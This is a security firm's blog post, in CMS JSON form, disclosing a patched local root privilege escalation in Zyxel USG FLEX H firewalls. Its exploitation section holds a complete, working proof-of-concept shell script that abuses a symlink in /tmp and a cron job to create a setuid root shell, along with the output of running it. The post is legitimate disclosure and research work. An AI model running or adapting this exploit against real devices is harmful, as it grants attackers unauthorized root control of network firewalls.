{"id":5313,"date":"2025-04-23T07:27:16","date_gmt":"2025-04-23T05:27:16","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=5313"},"modified":"2025-10-21T09:01:44","modified_gmt":"2025-10-21T09:01:44","slug":"local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","title":{"rendered":"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)"},"content":{"rendered":"<blockquote><p><em>&#8220;So we wait, this is our labour&#8230; we wait.&#8221;<\/em><br \/>\n<em>&#8212; Anthony Swofford on fuzzing<\/em><\/p><\/blockquote>\n<h3>TL;DR<\/h3>\n<p>The <a href=\"https:\/\/support.zyxel.eu\/hc\/en-us\/sections\/17702103398546-Series-USG-FLEX-H\">Zyxel USG FLEX H Series<\/a> is a high-performance <strong>firewall<\/strong> series designed to meet the needs of demanding and high-speed networks. It\u00a0offers faster boot times and improved CPU performance, making it superior to the standard USG FLEX Series.<\/p>\n<p>I&#8217;ve identified some <strong>security vulnerabilities<\/strong> in the Zyxel uOS Linux-based operating system distributed with these appliances, that allow local users with access to a Linux OS shell to <strong>escalate privileges to root<\/strong>. They were collectively assigned <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2025-1731\">CVE-2025-1731<\/a> (see below for additional details).<\/p>\n<p>The <strong>full advisory<\/strong> and proof-of-concept <strong>exploit<\/strong> are available on GitHub:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/hnsecurity\/vulns\/blob\/main\/HNS-2025-10-zyxel-fermion.txt\">https:\/\/github.com\/hnsecurity\/vulns\/blob\/main\/HNS-2025-10-zyxel-fermion.txt<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/0xdea\/exploits\/blob\/master\/zyxel\/raptor_fermion\">https:\/\/github.com\/0xdea\/exploits\/blob\/master\/zyxel\/raptor_fermion<\/a><\/li>\n<\/ul>\n<p>Zyxel&#8217;s <strong>official advisory<\/strong> and <strong>patches<\/strong> can be found at the following links:<\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><a href=\"https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025\">https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025<\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><a href=\"https:\/\/community.zyxel.com\/en\/discussion\/28988\/usg-flex-h-series-v1-32patch-0-firmware-release\">https:\/\/community.zyxel.com\/en\/discussion\/28988\/usg-flex-h-series-v1-32patch-0-firmware-release<\/a><\/li>\n<\/ul>\n<p>This research is the result of a <strong>collaboration<\/strong> with <a href=\"https:\/\/rainpwn.blog\/\">Alessandro Sgreccia<\/a> of <a href=\"https:\/\/hackerhood.redhotcyber.com\/\">HackerHood<\/a>. See also his advisory at:<\/p>\n<ul>\n<li><a href=\"https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732\">https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732<\/a><\/li>\n<\/ul>\n<h3>Background<\/h3>\n<p>Because of my <a href=\"https:\/\/hnsecurity.it\/multiple-vulnerabilities-in-zyxel-zysh\/\">previous research<\/a> on <strong>Zyxel appliances<\/strong>, after discovering a <strong>remote command execution vulnerability<\/strong> in the latest USG FLEX H Series (<a href=\"https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732\">CVE-2025-1731<\/a>), <a href=\"https:\/\/rainpwn.blog\/\">Alessandro Sgreccia<\/a> contacted me to ask for help with <strong>finding local privilege escalation vectors<\/strong>.<\/p>\n<figure id=\"attachment_5586\" aria-describedby=\"caption-attachment-5586\" style=\"width: 640px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" class=\"wp-image-5586 size-large\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/04\/zyxel_cert-e1744614763195-2-1024x655.png\" alt=\"\" width=\"640\" height=\"409\" \/><figcaption id=\"caption-attachment-5586\" class=\"wp-caption-text\">The prestigious Certificate of Recognition I got for my 2022 research on Zyxel devices<\/figcaption><\/figure>\n<p>Since USG FLEX H Series devices are based on a <strong>new AArch64 hardware<\/strong> and ship with a completely <strong>revamped Linux-based operating system<\/strong> (Zyxel uOS) that is supposed to be &#8220;secure by default&#8221; (a claim reminiscent of Oracle&#8217;s &#8220;unbreakable&#8221; <a href=\"https:\/\/www.zdnet.com\/article\/oracles-unbreakable-toy-story\/\">marketing campaign<\/a> in the days of yore), I couldn&#8217;t resist giving it a try&#8230; I quickly identified a <strong>viable privilege escalation vector<\/strong> related to the <em>Recovery Manager<\/em> functionality (<a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2025-1732\">CVE-2025-1732<\/a>) that was reported to the vendor by Alessandro together with <a href=\"https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732\">his other findings<\/a>.<\/p>\n<p>However, I wasn&#8217;t done yet. Since Alessandro kindly provided an access to his USG FLEX 100H test device, I decided to keep looking for some other low-hanging fruits, as an excuse to battle-test my new <a href=\"https:\/\/hnsecurity.it\/streamlining-vulnerability-research-with-ida-pro-and-rust\/\"><em>vulnerability divination<\/em> suite<\/a> written in <a href=\"https:\/\/hnsecurity.it\/tag\/rust\/\">Rust<\/a>. I started by examining <strong>setuid root binaries<\/strong> distributed with the OS.<\/p>\n<h3>Vulnerabilities<\/h3>\n<p>The custom setuid root binary program <strong><em>\/usr\/sbin\/fermion-wrapper<\/em> follows symbolic links in the <em>\/tmp<\/em> directory<\/strong> when run with the <em>register-status <\/em>argument. This allows local users with access to a Linux OS shell to <strong>trick the program into creating writable files at arbitrary locations<\/strong> in the filesystem. This vulnerability can be exploited to <strong>overwrite arbitrary files<\/strong> or <strong>locally escalate privileges<\/strong> from low-privileged user (e.g., <em>postgres<\/em>) to root.<\/p>\n<p>In addition, I identified a second issue in the filesystem: <strong>the <em>\/tmp<\/em> directory doesn&#8217;t have the sticky bit set<\/strong>. This small, overlooked detail simplifies exploitation of the <em>fermion-wrapper<\/em> vulnerability and may also open the door to <a href=\"https:\/\/en.wikipedia.org\/wiki\/Sticky_bit\">all sorts of havoc<\/a>.<\/p>\n<h3>Analysis<\/h3>\n<p>I leveraged my <a href=\"https:\/\/github.com\/0xdea\/haruspex\">haruspex<\/a> and <a href=\"https:\/\/github.com\/0xdea\/oneiromancer\">oneiromancer<\/a> tools to streamline the <strong>binary audit workflow<\/strong>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"minimal\" data-enlighter-linenumbers=\"false\">raptor@fnord Downloads % haruspex fermion-wrapper\r\nharuspex 0.4.1 - Tool to extract IDA decompiler's pseudo-code\r\nCopyright (c) 2024-2025 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\r\n\r\n[*] Trying to analyze binary file \"fermion-wrapper\"\r\n[+] Successfully analyzed binary file\r\n\r\n[-] Processor: ARM Little-endian\r\n[-] Compiler: GNU\r\n[-] File type: ELF\r\n\r\n[*] Preparing output directory \"fermion-wrapper.dec\"\r\n[+] Output directory is ready\r\n\r\n[*] Extracting pseudo-code of functions...\r\n\r\n...\r\n\r\n[+] Decompiled 98 functions into \"fermion-wrapper.dec\"\r\n[+] Done processing binary file \"fermion-wrapper\"\r\n\r\nraptor@fnord Downloads % oneiromancer fermion-wrapper.dec\/sub_4068AC@4068AC.c\r\noneiromancer 0.3.0 - GenAI assistant for C code analysis\r\nCopyright (c) 2025 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\r\n\r\n[*] Analyzing source code in \"fermion-wrapper.dec\/sub_4068AC@4068AC.c\"\r\n[+] Successfully analyzed source code\r\n\r\n\/*\r\n * getDeviceRegistrationStatus()\r\n *\r\n * This function retrieves the registration status of a device and stores\r\n * it in provided pointers. It uses cURL to make an HTTP request to a\r\n * specific URL with various options set for authentication and certificate\r\n * verification. The response is parsed using JSON to extract relevant\r\n * information about the device's registration status. If successful,\r\n * it updates cache files and performs additional actions based on the\r\n * registration status.\r\n *\/\r\n\r\n...\r\n\r\n[*] Saving improved source code in \"fermion-wrapper.dec\/sub_4068AC@4068AC.out.c\"\r\n[+] Done analyzing source code\r\n\r\nraptor@fnord Downloads %<\/pre>\n<p>I ended up with the following relevant <strong>pseudo-code<\/strong> for the <em>sub_4068AC <\/em>function, that is called directly by <em>main<\/em>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"minimal\" data-enlighter-highlight=\"38\">__int64 __fastcall sub_4068AC(_DWORD *isRegistered, _DWORD *isNeoAgentRegistered, _DWORD *bundleLicenseStatus)\r\n{\r\n...\r\n  requestUrl = \"https:\/\/he.myzyxel.com\/v1\/device\/status\";\r\n  jsonData = 0LL;\r\n  operationResult = -1;\r\n  statusCheckResult = 7;\r\n  if ( geteuid() )\r\n    sub_4072FC(\"\/usr\/bin\/sudo\", \"\/usr\/bin\/sudo\", \"\/usr\/bin\/touch\");\r\n  bufferSize = sub_4067DC(deviceName, 20);\r\n  curlHandle = curl_easy_init(bufferSize);\r\n  if ( curlHandle )\r\n  {\r\n    bioMemHandle = BIO_s_mem();\r\n    bioHandle = BIO_new(bioMemHandle);\r\n    if ( bioHandle )\r\n    {\r\n...\r\n      errorCode = curl_easy_perform(curlHandle);\r\n      if ( !errorCode )\r\n      {\r\n        jsonData = (unsigned __int64 *)json_load_callback(sub_406878, bioHandle, 0LL, &amp;jsonDataPointer);\r\n        if ( jsonData )\r\n        {\r\n          statusValue = (_DWORD *)json_object_get(jsonData, \"register\");\r\n...\r\n          if ( !operationResult )\r\n          {\r\n            statusCheckResult = 0;\r\n            statusCode = 2 * (2 * *isRegistered + *isNeoAgentRegistered) + *bundleLicenseStatus;\r\n            fileStream = fopen(\"\/share\/neoagent\/cache_register_status\", \"w\");\r\n            if ( fileStream )\r\n            {\r\n              fprintf(fileStream, \"%s\\n\", deviceName);\r\n              fprintf(fileStream, \"%d\\n\", statusCode);\r\n              fclose(fileStream);\r\n            }\r\n            fileStream = fopen(\"\/tmp\/register_status\", \"w\"); \/\/ VULN\r\n            if ( fileStream )\r\n            {\r\n              fprintf(fileStream, \"%s\\n\", deviceName);\r\n              fprintf(fileStream, \"%d\\n\", statusCode);\r\n              fclose(fileStream);\r\n            }\r\n            sub_406518(statusCheckResult, deviceName, errorCode);\r\n            if ( !access(\"\/usr\/sbin\/dha_send_fsync\", 0) )\r\n            {\r\n              sub_4072FC(\"\/usr\/sbin\/build_dha_cert_neoagent.sh\", \"\/usr\/sbin\/build_dha_cert_neoagent.sh\", 0LL);\r\n              sub_4072FC(\"\/usr\/sbin\/dha_send_fsync\", \"\/usr\/sbin\/dha_send_fsync\", \"8\");\r\n            }\r\n          }\r\n...<\/pre>\n<p>Unsurprisingly, the vulnerability lies at the highlighted line marked with <em>VULN <\/em>\ud83d\ude44\u00a0<strong>The binary running with elevated privileges can be tricked into following a symbolic link<\/strong> placed in <em>\/tmp\/register_status<\/em> by a local low-privileged user.<\/p>\n<p>As mentioned earlier, exploitation is simplified by the <strong>lack of sticky bit<\/strong> in the filesystem permissions of the <em>\/tmp<\/em> directory. This allows an attacker to replace any existent <em>\/tmp\/register_status<\/em> file even if it&#8217;s owned by another user, including root:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"minimal\" data-enlighter-linenumbers=\"false\">$ ls -ld \/tmp\r\ndrwxrwxrwx 30 root root 2240 Feb 27 18:16 \/tmp # \u00af\\_(\u30c4)_\/\u00af<\/pre>\n<h3>Exploitation<\/h3>\n<p>I&#8217;ve crafted a <strong>proof-of-concept<\/strong> <a href=\"https:\/\/github.com\/0xdea\/exploits\/blob\/master\/zyxel\/raptor_fermion\">exploit<\/a> that demonstrates how to achieve <strong>local privilege escalation<\/strong>. You can use it as follows:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"minimal\" data-enlighter-linenumbers=\"false\">$ .\/raptor_fermion\r\nraptor_fermion - Zyxel fermion-wrapper root LPE exploit\r\nCopyright (c) 2025 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\r\n\r\n[*] Exploiting \/usr\/sbin\/fermion-wrapper\r\n$ uname -a\r\nLinux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU\/Linux\r\n$ id\r\nuid=502(postgres) gid=502(postgres) groups=502(postgres)\r\n$ ls -l \/usr\/sbin\/fermion-wrapper\r\n-rwsr-xr-x 1 root root 44288 Jan  9 05:34 \/usr\/sbin\/fermion-wrapper\r\n{\"status\": 0, \"registered\": 1, \"nebula_registered\": 1, \"bundle\": 1}\r\n\r\n[+] Everything looks good \\o\/, wait an hour and check \/tmp\/pwned\r\n$ ls -l \/etc\/cron.d\/runme\r\n-rw-rw-rw- 1 root postgres 79 Feb 14 15:52 \/etc\/cron.d\/runme\r\n$ cat \/etc\/cron.d\/runme\r\n* * * * *   cp \/bin\/sh \/tmp\/pwned; chmod 4755 \/tmp\/pwned; rm \/etc\/cron.d\/runme\r\n\r\n[+] Run the shell as follows to bypass bash checks: \/tmp\/pwned -p\r\n\r\n[about one hour later...]\r\n\r\n$ ls -l \/tmp\/pwned\r\n-rwsr-xr-x 1 root root 916608 Feb 14 16:25 \/tmp\/pwned\r\n$ \/tmp\/pwned -p\r\n# id\r\nuid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)\r\n# R00t D4nc3!!!111! \\o\/<\/pre>\n<p>Here&#8217;s a screenshot for your viewing pleasure:<\/p>\n<p><a href=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/04\/zyxel-fermion1-e1744357609522-1.png\"><img decoding=\"async\" class=\"aligncenter wp-image-5528 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/04\/zyxel-fermion1-e1744357609522-1.png\" alt=\"\" width=\"2940\" height=\"1660\" \/><\/a><\/p>\n<p>And here&#8217;s the exploit code:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"bash\" data-enlighter-theme=\"minimal\" data-enlighter-highlight=\"20\">#!\/bin\/sh\r\n\r\necho \"raptor_fermion - Zyxel fermion-wrapper root LPE exploit\"\r\necho \"Copyright (c) 2025 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\"\r\necho\r\n\r\ntarget=\"\/usr\/sbin\/fermion-wrapper\"\r\ntmpfile=\"\/tmp\/register_status\"\r\nrunme=\"\/etc\/cron.d\/runme\"\r\nshell=\"\/tmp\/pwned\"\r\n\r\necho \"[*] Exploiting $target\"\r\necho \"$ uname -a\"\r\nuname -a\r\necho \"$ id\"\r\nid\r\necho \"$ ls -l $target\"\r\nls -l $target\r\n\r\numask 0\r\nrm $tmpfile\r\nln -s $runme \/tmp\/register_status\r\n$target register-status\r\necho \"* * * * *   cp \/bin\/sh $shell; chmod 4755 $shell; rm $runme\" &gt; $runme\r\n\r\nif [ \"`cat $runme 2&gt;\/dev\/null`\" = \"\" ]; then\r\n        echo \"[!] Error: something went wrong \u00af\\\\_(\u30c4)_\/\u00af\"\r\n        exit 1\r\nfi\r\n\r\necho\r\necho \"[+] Everything looks good \\\\o\/, wait an hour and check $shell\"\r\necho \"$ ls -l $runme\"\r\nls -l $runme\r\necho \"$ cat $runme\"\r\ncat $runme\r\n\r\necho\r\necho \"[+] Run the shell as follows to bypass bash checks: $shell -p\"\r\necho<\/pre>\n<p>It should be straightforward to understand. Note how I pulled off the <a href=\"https:\/\/github.com\/0xdea\/exploits\/blob\/master\/solaris\/raptor_xscreensaver\">old-school<\/a> <strong><em>umask 0<\/em> trick<\/strong> (see the highlighted line above) to be able to control the content of the file created by the vulnerable setuid binary.<\/p>\n<p>Also note how for some reason files in <em>\/etc\/cron.d<\/em>\u00a0get <strong>processed every 50 minutes <\/strong>or so, instead of almost instantly as it happens on a standard Linux distribution&#8230; I leave the quest of looking for a better exploitation vector as an exercise for you, dear reader \ud83d\ude09<\/p>\n<h3>Affected products<\/h3>\n<p>I confirmed the vulnerabilities in the following <strong>products and firmware versions<\/strong>:<\/p>\n<ul>\n<li>Zyxel USG FLEX 100H with Firmware Version 1.31(ABXF.0)<\/li>\n<li>Zyxel USG FLEX 200H with Firmware Version 1.31(ABWV.0)<\/li>\n<\/ul>\n<p>Other products and earlier firmware versions may also be vulnerable. Please refer to Zyxel&#8217;s official <a href=\"https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025\">security advisory<\/a> for additional information.<\/p>\n<h3>Remediation<\/h3>\n<p>During the whole coordinated disclosure process, Zyxel was very responsive.<\/p>\n<p>Unfortunately, despite my objections they <strong>insisted in using the already-assigned CVE-2025-1731 as the identifier for my local privilege escalation vulnerability<\/strong>. These are their statements in this regard:<\/p>\n<blockquote><p><em>&#8220;Our product team has identified that the attack surface of the local privileges escalation issue stems from an incorrect permission assignment within the PostgreSQL commands. This misconfiguration grants users with &#8216;postgres&#8217; privileges the ability to access the Linux shell. A similar issue was recently reported by another researcher, and CVE-2025-1731 has been reserved to identify the vulnerability.&#8221;<\/em><\/p>\n<p><em>&#8220;We kindly request any evidence demonstrating an alternative method to access the device&#8217;s Linux shell for executing the malicious scripts or the PoC exploit, &#8216;raptor_fermion,&#8217; that you previously shared. If such evidence is unavailable, we will proceed with using CVE-2025-1731 as the identifier for this issue.&#8221;<\/em><\/p>\n<p><em>&#8220;We could not identify any explicit evidence in your report that demonstrates an alternative method distinct from CVE-2025-1731 that would allow attackers to gain access to the Linux shell. Consequently, we have decided not to assign a separate CVE ID to the local privilege escalation issue, as it aligns with the attack surface of CVE-2025-1731. Nevertheless, we appreciate your finding and will ensure it is acknowledged in CVE-2025-1731.&#8221;<\/em><\/p><\/blockquote>\n<p>I regret any confusion caused by this decision.<\/p>\n<p>As for the <strong>lack of sticky bit in the <em>\/tmp<\/em> directory<\/strong>, Zyxel stated the following:<\/p>\n<blockquote><p><em>&#8220;We currently do not consider this a security issue. However, we are open to reevaluating if you can provide a clear example demonstrating how it could result in a denial of service (DoS) problem. Otherwise, we will treat this as an implementation flaw rather than a vulnerability.&#8221;<\/em><\/p><\/blockquote>\n<p>Please refer to Zyxel&#8217;s official <a href=\"https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025\">security advisory<\/a> for patching information. I have not checked the effectiveness of the fixes.<\/p>\n<h3>Disclosure timeline<\/h3>\n<p>The coordinated disclosure timeline follows:<\/p>\n<ul>\n<li><strong>2025-02-05<\/strong>: Alessandro Sgreccia contacted us to propose a collaboration.<\/li>\n<li><strong>2025-03-10<\/strong>: Zyxel PSIRT was notified via &lt;security@zyxel.com.tw&gt; and acknowledged receipt of our advisory and PoC exploit.<\/li>\n<li><strong>2025-03-17<\/strong>: Zyxel PSIRT communicated their intention of using the already-assigned <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2025-1731\">CVE-2025-1731<\/a> as the identifier for our local privilege escalation vulnerability.<\/li>\n<li><strong>2025-03-17<\/strong>: We disagreed with Zyxel PSIRT and explained that using an unrelated CVE identifier for our issues would likely cause confusion.<\/li>\n<li><strong>2025-03-18<\/strong>: Zyxel PSIRT confirmed their decision of not assigning a separate CVE ID to the local privilege escalation issue; they also stated that they don&#8217;t consider the lack of sticky bit in <em>\/tmp<\/em> a security issue, but simply an implementation flaw.<\/li>\n<li><strong>2025-04-15<\/strong>: Zyxel released <a href=\"https:\/\/community.zyxel.com\/en\/discussion\/28988\/usg-flex-h-series-v1-32patch-0-firmware-release\">version 1.32 of its firmware<\/a> that includes fixes for the reported vulnerabilities.<\/li>\n<li><strong>2025-04-22<\/strong>: Zyxel PSIRT published their <a href=\"https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025\">security advisory<\/a>.<\/li>\n<li><strong>2025-02-22<\/strong>: Alessandro Sgreccia published his <a href=\"https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732\">security advisory<\/a>.<\/li>\n<li><strong>2025-04-23<\/strong>: We published our own <a href=\"https:\/\/github.com\/hnsecurity\/vulns\/blob\/main\/HNS-2025-10-zyxel-fermion.txt\">advisory<\/a> with full details.<\/li>\n<\/ul>\n<h3>Acknowledgments<\/h3>\n<p>I&#8217;d like to thank <a href=\"https:\/\/rainpwn.blog\/\">Alessandro Sgreccia<\/a> of <a href=\"https:\/\/hackerhood.redhotcyber.com\/\">HackerHood<\/a> for involving me in his research and for kindly providing access to his USG FLEX 100H test device.\u00a0I\u2019ve been on a break from vulnerability research and I was a bit <a href=\"https:\/\/hnsecurity.it\/tag\/rust\/\">rusty<\/a> (pun intended), therefore this was a welcome diversion. It&#8217;s been a real pleasure working together!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;So we wait, this is our labour&#8230; we wait.&#8221; &#8212; Anthony Swofford on fuzzing TL;DR The Zyxel USG FLEX H [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":159969,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[78,81],"tags":[222,552,74,75,77,82,109],"class_list":["post-5313","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploits","category-vulnerabilities","tag-cve-2025-1731","tag-network","tag-0day","tag-advisory","tag-exploit","tag-vulnerability-research","tag-zyxel"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -<\/title>\n<meta name=\"description\" content=\"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -\" \/>\n<meta property=\"og:description\" content=\"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/\" \/>\n<meta property=\"og:site_name\" content=\"HN Security\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-23T05:27:16+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T09:01:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"836\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Marco Ivaldi\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hnsec\" \/>\n<meta name=\"twitter:site\" content=\"@hnsec\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Marco Ivaldi\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\"},\"author\":{\"name\":\"Marco Ivaldi\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\"},\"headline\":\"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)\",\"datePublished\":\"2025-04-23T05:27:16+00:00\",\"dateModified\":\"2025-10-21T09:01:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\"},\"wordCount\":1317,\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/ZYXEL.jpg\",\"keywords\":[\"cve-2025-1731\",\"network\",\"0day\",\"advisory\",\"exploit\",\"vulnerability research\",\"zyxel\"],\"articleSection\":[\"Exploits\",\"Vulnerabilities\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\",\"name\":\"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/ZYXEL.jpg\",\"datePublished\":\"2025-04-23T05:27:16+00:00\",\"dateModified\":\"2025-10-21T09:01:44+00:00\",\"description\":\"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#primaryimage\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/ZYXEL.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/ZYXEL.jpg\",\"width\":1600,\"height\":836,\"caption\":\"Zyxel Networks logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"name\":\"HN Security\",\"description\":\"Offensive Security 